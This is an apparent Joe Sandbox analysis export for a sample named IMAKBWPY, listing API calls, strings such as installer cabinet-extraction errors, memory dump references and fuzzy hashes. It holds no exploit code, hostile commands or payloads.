                                                                                                                • Instruction ID: 6920adbb37e802defa5ebadf4505a6e31657cdb098cc7e0a266f252a3d76397f
                                                                                                                • Opcode Fuzzy Hash: e7d7122604285c81cce8e8302509b5081e80cca385c22a9b83a4893848321ba7
                                                                                                                • Instruction Fuzzy Hash: 0C31B637D60239ABD712AA998C41FAFFAB8AF45750F118255FD1CE7241E730DD208AD4
                                                                                                                APIs
                                                                                                                • DefWindowProcW.USER32(?,00000082,?,?), ref: 0024E985
                                                                                                                • SetWindowLongW.USER32(?,000000EB,00000000), ref: 0024E994
                                                                                                                • SetWindowLongW.USER32(?,000000EB,?), ref: 0024E9A8
                                                                                                                • DefWindowProcW.USER32(?,?,?,?), ref: 0024E9B8
                                                                                                                • GetWindowLongW.USER32(?,000000EB), ref: 0024E9D2
                                                                                                                • PostQuitMessage.USER32(00000000), ref: 0024EA31
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000011.00000002.2179813995.0000000000231000.00000020.00000001.01000000.00000011.sdmp, Offset: 00230000, based on PE: true
                                                                                                                • Associated: 00000011.00000002.2179506258.0000000000230000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2180693815.000000000027B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2181773914.000000000029A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2182538763.000000000029D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_17_2_230000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Long$Proc$MessagePostQuit
                                                                                                                • String ID:
                                                                                                                • API String ID: 3812958022-0
                                                                                                                • Opcode ID: e58887bbc47f7754df1855333f672c121f2dec4ab5daaf9a8ad3843680a5469b
                                                                                                                • Instruction ID: c77cf49cb9c1881c4845509dfe68f68e0d1908366114da33cb3c2a348c8bad0c
                                                                                                                • Opcode Fuzzy Hash: e58887bbc47f7754df1855333f672c121f2dec4ab5daaf9a8ad3843680a5469b
                                                                                                                • Instruction Fuzzy Hash: 0A210331114115FFEF0A9F68EC0CE6A3B65FF48310F114218F90A9A1A0C331DDA0DB50
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000011.00000002.2198452182.0000000010001000.00000020.00000001.01000000.00000012.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000011.00000002.2198387888.0000000010000000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2198565458.000000001004A000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2198692448.0000000010067000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2198869837.000000001006B000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2198954748.000000001006D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2199183766.0000000010074000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2199273379.0000000010076000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_17_2_10000000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateProcess$ExitHeapSleep
                                                                                                                • String ID: D
                                                                                                                • API String ID: 1424989813-2746444292
                                                                                                                • Opcode ID: 37a9097b5e05218b608cf946633e050db2cabbb1e669ccfe0c4028d7bca420c7
                                                                                                                • Instruction ID: d134c3a45d9883e2efbdd1ba7b49fe62d87b1b23e541c2052632ef6d7f12f0c9
                                                                                                                • Opcode Fuzzy Hash: 37a9097b5e05218b608cf946633e050db2cabbb1e669ccfe0c4028d7bca420c7
                                                                                                                • Instruction Fuzzy Hash: C68193B4914209CFDB40DFA8C985A9EBBF0FF49314F018569E894E7360E775AA44CF92
                                                                                                                APIs
                                                                                                                • SetFilePointerEx.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?), ref: 00250B27
                                                                                                                • GetLastError.KERNEL32(?,?,?), ref: 00250B31
                                                                                                                Strings
                                                                                                                • cabextract.cpp, xrefs: 00250B55
                                                                                                                • Failed to move file pointer 0x%x bytes., xrefs: 00250B62
                                                                                                                • Invalid seek type., xrefs: 00250ABD
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000011.00000002.2179813995.0000000000231000.00000020.00000001.01000000.00000011.sdmp, Offset: 00230000, based on PE: true
                                                                                                                • Associated: 00000011.00000002.2179506258.0000000000230000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2180693815.000000000027B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2181773914.000000000029A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2182538763.000000000029D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_17_2_230000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorFileLastPointer
                                                                                                                • String ID: Failed to move file pointer 0x%x bytes.$Invalid seek type.$cabextract.cpp
                                                                                                                • API String ID: 2976181284-417918914
                                                                                                                • Opcode ID: 2742c36fd6408c5e5dd749d0b1f16869710c75b73aa96bd3be638c77a5ee832a
                                                                                                                • Instruction ID: 2bab1d9e9af03cf4f9ebad65eae70d0837a1e032b86a66fbe1fb5dea3667905a
                                                                                                                • Opcode Fuzzy Hash: 2742c36fd6408c5e5dd749d0b1f16869710c75b73aa96bd3be638c77a5ee832a
                                                                                                                • Instruction Fuzzy Hash: CB31C036A6021AEFCB10DFA8DCC5E6EB769FF04729B048125FD1497251D770ED248B94
                                                                                                                APIs
                                                                                                                • CreateDirectoryW.KERNELBASE(?,840F01E8,00000000,00000000,?,0024A0E8,00000000,00000000,?,00000000,002353BD,00000000,?,?,0023D5B5,?), ref: 00234123
                                                                                                                • GetLastError.KERNEL32(?,0024A0E8,00000000,00000000,?,00000000,002353BD,00000000,?,?,0023D5B5,?,00000000,00000000), ref: 00234131
                                                                                                                • CreateDirectoryW.KERNEL32(?,840F01E8,00235489,?,0024A0E8,00000000,00000000,?,00000000,002353BD,00000000,?,?,0023D5B5,?,00000000), ref: 0023419A
                                                                                                                • GetLastError.KERNEL32(?,0024A0E8,00000000,00000000,?,00000000,002353BD,00000000,?,?,0023D5B5,?,00000000,00000000), ref: 002341A4
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000011.00000002.2179813995.0000000000231000.00000020.00000001.01000000.00000011.sdmp, Offset: 00230000, based on PE: true
                                                                                                                • Associated: 00000011.00000002.2179506258.0000000000230000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2180693815.000000000027B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2181773914.000000000029A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2182538763.000000000029D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_17_2_230000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateDirectoryErrorLast
                                                                                                                • String ID: dirutil.cpp
                                                                                                                • API String ID: 1375471231-2193988115
                                                                                                                • Opcode ID: bfc321e43094f06a6183d2a827df28f8d1954154ce8b4d2ac0f84ea5b8953194
                                                                                                                • Instruction ID: fa0dc69bddde4596787ccfdb741bfadaf69a923c627fc87f4b250c4c24f61c79
                                                                                                                • Opcode Fuzzy Hash: bfc321e43094f06a6183d2a827df28f8d1954154ce8b4d2ac0f84ea5b8953194
                                                                                                                • Instruction Fuzzy Hash: B11135A2630B3296D7313FA15C44B3BA654EF32B61F0000A2FD8CEB200E360ADF09290
                                                                                                                APIs
                                                                                                                • lstrlenA.KERNEL32(;$,00000000,00000000,?,?,?,00270013,0024E93B,0024E93B,?,00000000,0000FDE9,?,0024E93B,8000FFFF,Unexpected return value from message pump.), ref: 00270776
                                                                                                                • WriteFile.KERNELBASE(00000200,00000000,00000000,?,00000000,?,?,00270013,0024E93B,0024E93B,?,00000000,0000FDE9,?,0024E93B,8000FFFF), ref: 002707B2
                                                                                                                • GetLastError.KERNEL32(?,?,00270013,0024E93B,0024E93B,?,00000000,0000FDE9,?,0024E93B,8000FFFF,Unexpected return value from message pump.), ref: 002707BC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000011.00000002.2179813995.0000000000231000.00000020.00000001.01000000.00000011.sdmp, Offset: 00230000, based on PE: true
                                                                                                                • Associated: 00000011.00000002.2179506258.0000000000230000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2180693815.000000000027B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2181773914.000000000029A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2182538763.000000000029D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_17_2_230000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorFileLastWritelstrlen
                                                                                                                • String ID: ;$$logutil.cpp
                                                                                                                • API String ID: 606256338-923696308
                                                                                                                • Opcode ID: 46b87da7898f01e74ca2977e6496b72ec8458334307923ce2b0a1a59d06ec45f
                                                                                                                • Instruction ID: 89529f42aace3339f6f70b0d53b75f865ec6af2bdd9819850be2baf5c11f4dbc
                                                                                                                • Opcode Fuzzy Hash: 46b87da7898f01e74ca2977e6496b72ec8458334307923ce2b0a1a59d06ec45f
                                                                                                                • Instruction Fuzzy Hash: 2511CA72960225EB8715CAAA9DC9EAFFB6CEB45760F414225FD08EB140D770BD10C9E0
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00270F6C: RegOpenKeyExW.KERNELBASE ref: 00270F80
                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 00243B42
                                                                                                                  • Part of subcall function 002710B5: RegQueryValueExW.ADVAPI32 ref: 0027112B
                                                                                                                  • Part of subcall function 002710B5: RegQueryValueExW.ADVAPI32 ref: 00271163
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000011.00000002.2179813995.0000000000231000.00000020.00000001.01000000.00000011.sdmp, Offset: 00230000, based on PE: true
                                                                                                                • Associated: 00000011.00000002.2179506258.0000000000230000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2180693815.000000000027B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2181773914.000000000029A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2182538763.000000000029D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_17_2_230000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: QueryValue$CloseOpen
                                                                                                                • String ID: Logging$SOFTWARE\Policies\Microsoft\Windows\Installer$feclient.dll
                                                                                                                • API String ID: 1586453840-3596319545
                                                                                                                • Opcode ID: 84332d2730080524df70c8f4475c9480132393897159caf7a7dd73cda2fa592f
                                                                                                                • Instruction ID: c65218946fb542a002840063b95f53547084e0c521c547d61eb026f92fc89526
                                                                                                                • Opcode Fuzzy Hash: 84332d2730080524df70c8f4475c9480132393897159caf7a7dd73cda2fa592f
                                                                                                                • Instruction Fuzzy Hash: B911E636B60209BBDB26DF94DC86FAAB7B8FB10B54F404061E5009B080D6B19FA0D710
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0025140C: SetFilePointerEx.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000000,?,00250A19,?,?,?), ref: 00251434
                                                                                                                  • Part of subcall function 0025140C: GetLastError.KERNEL32(?,00250A19,?,?,?), ref: 0025143E
                                                                                                                • ReadFile.KERNELBASE(?,?,?,?,00000000,?,?,?), ref: 00250A27
                                                                                                                • GetLastError.KERNEL32 ref: 00250A31
                                                                                                                Strings
                                                                                                                • cabextract.cpp, xrefs: 00250A55
                                                                                                                • Failed to read during cabinet extraction., xrefs: 00250A5F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000011.00000002.2179813995.0000000000231000.00000020.00000001.01000000.00000011.sdmp, Offset: 00230000, based on PE: true
                                                                                                                • Associated: 00000011.00000002.2179506258.0000000000230000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2180693815.000000000027B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2181773914.000000000029A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2182538763.000000000029D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_17_2_230000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorFileLast$PointerRead
                                                                                                                • String ID: Failed to read during cabinet extraction.$cabextract.cpp
                                                                                                                • API String ID: 2170121939-2426083571
                                                                                                                • Opcode ID: 43201bb034379edc6b5f6aa37ba0ff9200200d4e1b341135547dab564100e6b6
                                                                                                                • Instruction ID: a2aa5f3d632db1d1f0513fc7958cf3f629801b501ff39775423f3338da3e70b9
                                                                                                                • Opcode Fuzzy Hash: 43201bb034379edc6b5f6aa37ba0ff9200200d4e1b341135547dab564100e6b6
                                                                                                                • Instruction Fuzzy Hash: 2E11CE36A21229BBDB21AF95DC48E9A7B68FB05761B014115FE08A7291C730A920CBD4
                                                                                                                APIs
                                                                                                                • SetFilePointerEx.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000000,?,00250A19,?,?,?), ref: 00251434
                                                                                                                • GetLastError.KERNEL32(?,00250A19,?,?,?), ref: 0025143E
                                                                                                                Strings
                                                                                                                • Failed to move to virtual file pointer., xrefs: 0025146C
                                                                                                                • cabextract.cpp, xrefs: 00251462
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000011.00000002.2179813995.0000000000231000.00000020.00000001.01000000.00000011.sdmp, Offset: 00230000, based on PE: true
                                                                                                                • Associated: 00000011.00000002.2179506258.0000000000230000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2180693815.000000000027B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2181773914.000000000029A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2182538763.000000000029D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_17_2_230000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorFileLastPointer
                                                                                                                • String ID: Failed to move to virtual file pointer.$cabextract.cpp
                                                                                                                • API String ID: 2976181284-3005670968
                                                                                                                • Opcode ID: a849e221f81f9ac780d16d63c90388fcf0791db16c9929c236cbbeac076c07b8
                                                                                                                • Instruction ID: 129f9be03eeb918cf2d42fbba0df54ce69f9c8e630886230c2159d932d82c1aa
                                                                                                                • Opcode Fuzzy Hash: a849e221f81f9ac780d16d63c90388fcf0791db16c9929c236cbbeac076c07b8
                                                                                                                • Instruction Fuzzy Hash: 1E018F37961636B7D7215A969C08F8BBB24EF017727128126FD18AA151DB319C30CAD8
                                                                                                                APIs
                                                                                                                • SetEvent.KERNEL32(0027B478,00000000,?,00251717,?,00000000,?,0023C287,?,00235405,?,002475A5,?,?,00235405,?), ref: 002507BF
                                                                                                                • GetLastError.KERNEL32(?,00251717,?,00000000,?,0023C287,?,00235405,?,002475A5,?,?,00235405,?,00235445,00000001), ref: 002507C9
                                                                                                                Strings
                                                                                                                • Failed to set begin operation event., xrefs: 002507F7
                                                                                                                • cabextract.cpp, xrefs: 002507ED
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000011.00000002.2179813995.0000000000231000.00000020.00000001.01000000.00000011.sdmp, Offset: 00230000, based on PE: true
                                                                                                                • Associated: 00000011.00000002.2179506258.0000000000230000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2180693815.000000000027B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2181773914.000000000029A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2182538763.000000000029D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_17_2_230000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorEventLast
                                                                                                                • String ID: Failed to set begin operation event.$cabextract.cpp
                                                                                                                • API String ID: 3848097054-4159625223
                                                                                                                • Opcode ID: 2eff1115c245cd7f39ccdcb5f128fd5ea4bde8463382b1e6d951b81cf62aa4a6
                                                                                                                • Instruction ID: bb163dc71eab747240ba339d4c74e4570859e000c5523763e918cd18074d0328
                                                                                                                • Opcode Fuzzy Hash: 2eff1115c245cd7f39ccdcb5f128fd5ea4bde8463382b1e6d951b81cf62aa4a6
                                                                                                                • Instruction Fuzzy Hash: 29F05C3757323167922166A55D4DF8FB6849F05B72B020121FE05FB140EB30AC30C6D9
                                                                                                                APIs
                                                                                                                • lstrlenW.KERNEL32(burn.clean.room,?,?,?,?,00231104,?,?,00000000), ref: 00235142
                                                                                                                • CompareStringW.KERNELBASE(0000007F,00000001,?,0000000F,burn.clean.room,0000000F,?,?,?,?,00231104,?,?,00000000), ref: 00235172
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000011.00000002.2179813995.0000000000231000.00000020.00000001.01000000.00000011.sdmp, Offset: 00230000, based on PE: true
                                                                                                                • Associated: 00000011.00000002.2179506258.0000000000230000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2180693815.000000000027B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2181773914.000000000029A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2182538763.000000000029D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_17_2_230000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CompareStringlstrlen
                                                                                                                • String ID: burn.clean.room
                                                                                                                • API String ID: 1433953587-3055529264
                                                                                                                • Opcode ID: 69a256e4dda9b4701090ca2290acf6f0b64453a0046e4fcb57a44654dfe4fcff
                                                                                                                • Instruction ID: 398cccab5fef7da22a6096636e2f5e349ee6bbc92ffb84aaa404338d9d44adb1
                                                                                                                • Opcode Fuzzy Hash: 69a256e4dda9b4701090ca2290acf6f0b64453a0046e4fcb57a44654dfe4fcff
                                                                                                                • Instruction Fuzzy Hash: 65016DB26206356F87308F49AD88A77BBBCEB157A0F104116F94DC3610D3749C61CAE1
                                                                                                                APIs
                                                                                                                • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00233877
                                                                                                                • GetLastError.KERNEL32 ref: 00233881
                                                                                                                • LoadLibraryW.KERNELBASE(?,?,00000104,?), ref: 002338EA
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000011.00000002.2179813995.0000000000231000.00000020.00000001.01000000.00000011.sdmp, Offset: 00230000, based on PE: true
                                                                                                                • Associated: 00000011.00000002.2179506258.0000000000230000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2180693815.000000000027B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2181773914.000000000029A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2182538763.000000000029D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_17_2_230000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DirectoryErrorLastLibraryLoadSystem
                                                                                                                • String ID:
                                                                                                                • API String ID: 1230559179-0
                                                                                                                • Opcode ID: 2cc6ef25daef936c63723023bce91b96129ce0372f3596462685fb5dce1e732c
                                                                                                                • Instruction ID: 25cf89277aa4ebb4da3ae8138adbf6276881d24b16c59ec15411062331f31d6d
                                                                                                                • Opcode Fuzzy Hash: 2cc6ef25daef936c63723023bce91b96129ce0372f3596462685fb5dce1e732c
                                                                                                                • Instruction Fuzzy Hash: E421D3F2D1123DABDB20DB659C49F9AB7A89B00710F1101A1FE18EB241EA70DF548BD0
                                                                                                                APIs
                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,00233BB6,00000000,?,00231474,00000000,75C0B390,00000000,75C0B390,00000000,?,?,002313B8), ref: 00233A20
                                                                                                                • RtlFreeHeap.NTDLL(00000000,?,00233BB6,00000000,?,00231474,00000000,75C0B390,00000000,75C0B390,00000000,?,?,002313B8,?,00000100), ref: 00233A27
                                                                                                                • GetLastError.KERNEL32(?,00233BB6,00000000,?,00231474,00000000,75C0B390,00000000,75C0B390,00000000,?,?,002313B8,?,00000100,?), ref: 00233A31
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000011.00000002.2179813995.0000000000231000.00000020.00000001.01000000.00000011.sdmp, Offset: 00230000, based on PE: true
                                                                                                                • Associated: 00000011.00000002.2179506258.0000000000230000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2180693815.000000000027B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2181773914.000000000029A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2182538763.000000000029D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_17_2_230000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Heap$ErrorFreeLastProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 406640338-0
                                                                                                                • Opcode ID: cb6b299e435abe7a36417e294a6fe698310d9f67cf8e40740b280bd2db4a36f5
                                                                                                                • Instruction ID: 7a20b42eff470c0f7d508b9c72a91a254daddfeefb672f8102b4e37da930d088
                                                                                                                • Opcode Fuzzy Hash: cb6b299e435abe7a36417e294a6fe698310d9f67cf8e40740b280bd2db4a36f5
                                                                                                                • Instruction Fuzzy Hash: 86D01273A0413A5787225BE66C5CA5B7F58EF05AB1B410121FD4CD6220D725CD5096E4
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00270F6C: RegOpenKeyExW.KERNELBASE ref: 00270F80
                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 0023F7B9
                                                                                                                  • Part of subcall function 00271026: RegQueryValueExW.ADVAPI32 ref: 0027104B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000011.00000002.2179813995.0000000000231000.00000020.00000001.01000000.00000011.sdmp, Offset: 00230000, based on PE: true
                                                                                                                • Associated: 00000011.00000002.2179506258.0000000000230000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2180693815.000000000027B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2181773914.000000000029A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2182538763.000000000029D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_17_2_230000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseOpenQueryValue
                                                                                                                • String ID: Installed
                                                                                                                • API String ID: 3677997916-3662710971
                                                                                                                • Opcode ID: e2a2c516b19f7844d046e7898da731791c3fdf7692c1864772159d2b3221ddbb
                                                                                                                • Instruction ID: 7a2fc6c0ef8e62c21fd22203ffe6e2758aba7faadfc1346c733953b68a17c925
                                                                                                                • Opcode Fuzzy Hash: e2a2c516b19f7844d046e7898da731791c3fdf7692c1864772159d2b3221ddbb
                                                                                                                • Instruction Fuzzy Hash: 69018F76830218EBCB51DB94DD46BDEBBB8EF04711F1141A4E800A7120D7755E609B90
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000011.00000002.2179813995.0000000000231000.00000020.00000001.01000000.00000011.sdmp, Offset: 00230000, based on PE: true
                                                                                                                • Associated: 00000011.00000002.2179506258.0000000000230000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2180693815.000000000027B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2181773914.000000000029A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2182538763.000000000029D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_17_2_230000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Open
                                                                                                                • String ID: regutil.cpp
                                                                                                                • API String ID: 71445658-955085611
                                                                                                                • Opcode ID: f96173c6d07dfdd83e6b0d40f428dd642922f279fe9a824d5eb8444055ccb122
                                                                                                                • Instruction ID: 6a6d2032872e1a04102dd6513c02e2c07f45ae739acb1eff20bebde9bb0067d9
                                                                                                                • Opcode Fuzzy Hash: f96173c6d07dfdd83e6b0d40f428dd642922f279fe9a824d5eb8444055ccb122
                                                                                                                • Instruction Fuzzy Hash: 16F04673631132E69B3009668C45B6BAA49DB817B0F15C122FD4E9A650EA708C3096F2
                                                                                                                APIs
                                                                                                                • HeapCreate.KERNELBASE(00000000,00001000,00000000,1003A8F5,00000001), ref: 1003D1AD
                                                                                                                  • Part of subcall function 1003D054: GetVersionExA.KERNEL32 ref: 1003D073
                                                                                                                • HeapDestroy.KERNEL32 ref: 1003D1EC
                                                                                                                  • Part of subcall function 1003D628: HeapAlloc.KERNEL32(00000000,00000140,1003D1D5,000003F8), ref: 1003D635
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000011.00000002.2198452182.0000000010001000.00000020.00000001.01000000.00000012.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000011.00000002.2198387888.0000000010000000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2198565458.000000001004A000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2198692448.0000000010067000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2198869837.000000001006B000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2198954748.000000001006D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2199183766.0000000010074000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2199273379.0000000010076000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_17_2_10000000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Heap$AllocCreateDestroyVersion
                                                                                                                • String ID:
                                                                                                                • API String ID: 2507506473-0
                                                                                                                • Opcode ID: 8242cd12b3c48fb9aa1d6b5f83fa064202d2bfdfad0f30c1d68451e9dde9e146
                                                                                                                • Instruction ID: 52e3ab181272d3760f74004b90cdb2a6ff6abea490e9912c8058f7bf90643b1f
                                                                                                                • Opcode Fuzzy Hash: 8242cd12b3c48fb9aa1d6b5f83fa064202d2bfdfad0f30c1d68451e9dde9e146
                                                                                                                • Instruction Fuzzy Hash: 92F06530A54352AFFB16EB30BD4675936DDE701B83F100627F904DC0A0EBA585C0D511
                                                                                                                APIs
                                                                                                                • GetProcessHeap.KERNEL32(?,?,?,?,0023226D,?,?,00000001,75C0B390,8000FFFF,?,?,00270267,?,?,00000000), ref: 00233B04
                                                                                                                • RtlReAllocateHeap.NTDLL(00000000,?,0023226D,?,?,00000001,75C0B390,8000FFFF,?,?,00270267,?,?,00000000,00000000,8000FFFF), ref: 00233B0B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000011.00000002.2179813995.0000000000231000.00000020.00000001.01000000.00000011.sdmp, Offset: 00230000, based on PE: true
                                                                                                                • Associated: 00000011.00000002.2179506258.0000000000230000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2180693815.000000000027B000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2181773914.000000000029A000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                                                                • Associated: 00000011.00000002.2182538763.000000000029D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_17_2_230000_IMAKBWPY.jbxd
